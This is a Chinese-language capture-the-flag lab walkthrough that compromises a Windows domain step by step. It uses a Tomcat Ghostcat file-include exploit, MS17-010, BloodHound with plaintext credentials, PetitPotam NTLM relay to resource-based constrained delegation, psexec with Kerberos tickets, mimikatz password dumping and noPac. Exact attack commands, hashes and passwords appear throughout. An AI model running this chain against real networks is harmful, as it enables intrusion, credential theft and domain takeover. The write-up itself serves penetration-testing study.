春秋云镜-Spoofing
信息收集
到手ip直接fscan


8080端口存在web;8009不给访问,上dirsearch扫8080
存在tomcat路由 http://39.98.108.27:8080/docs/

cve-2020-1938
搜索漏洞

poc直接读取web.xml

存在文件上传接口(http://39.98.108.27:8080/UploadServlet)

CNVD-2020-10487
1 | python ajpShooter.py http://39.98.108.27:8080 8009 /upload/c953672209c1c9411df8253d5e1344c2/20250914045300403.txt eval |



顺手wget venom/fscan

1 | 扫出了.45的ms17-010 |
建隧道打172.22.11.45 ms17-010


1 | flag{1a528a49-5f65-493e-9713-b3354f003cdb} |
打172.22.11.26 CVE-2020-0796
永恒之黑,试了一次,失败了
不成功和内存大小也有关系,Win10的内存一定不要太小,我这里给到8G。
感觉是内存太小了
172.22.11.45抓取哈希

psexec.py、smbexec.py、 wmiexec.py全都因缺乏权限而GG,我们似乎应该转换思路了
172.22.11.45域信息收集
使用BloodHound进行信息收集
1 | proxychains bloodhound-python -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -c all -ns 172.22.11.6 --zip --dns-tcp |
导入之后啥也看不出来
NetExec信息收集
1 | nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare -M shadowcoerce -M petitpotam |


使用PetitPotam进行NTLM-RELAY+RBCD
即 赋予机器账户获取开了Webdav服务的机器(.26)的GenericAll,使其能打开了Webdav服务的机器的RBCD
1 | 172.22.11.76 |
使用PetitPotam让26访问中继,获取对应的TGT,再利用获取的TGT申请ST,进而对26横向
而中继是起在攻击机上的,换句话来说,26得能直接访问攻击机,在内网的kali显然gg,我们有两个选择:
1 | 1.vps起中继,26直接访问vps |
还是1方便(偷懒),只是比赛时候得跳一层windows(way2)或者得配kali桥接了
1 | 开启ntlmrelayx.py |
1 | 使用Petitpotam触发 XR-LCM3AE8B 认证到vps |


后续测试发现失败,机器不出网,只能转发了
最外层ubuntu运行
1 | # 转发80到vps80 |
vps运行
1 | # 启用ntlmrelayx |
接下来xr-desktop$有了GenericAll 或 WriteDacl就是通过基于资源的约束委派获取ST票据,然后注入内存、psexec来获取交互式shell
1 | # 用之前172.22.11.45上抓的机器账户XR-DESKTOP$哈希打172.22.11.26的RBCD,申请ST票据 |

导入票据
1 | export KRB5CCNAME=administrator.ccache |
进行psexec无密码连接
1 | proxychains python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk |

1 | flag{ad2b2c7f-22c8-4e8d-9755-34e1aafd7ace} |
172.22.11.26域信息收集
smbclient.py 传猕猴桃
1 | proxychains python3 smbclient.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 |
猕猴桃抓取密码
1 | mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" |
出现新用户zhanghui 的ntlm
再次使用ncx扫出了nopac(这部分来不及了,没截图)
他在MA_Admin组,对computer能够创建对象,能向域中添加机器账户,所以能打noPac
Nopac拿下域控
1 | proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell |

1 | flag{bf9d27d3-57ed-4acb-b6e0-7b77a38a6ba8} |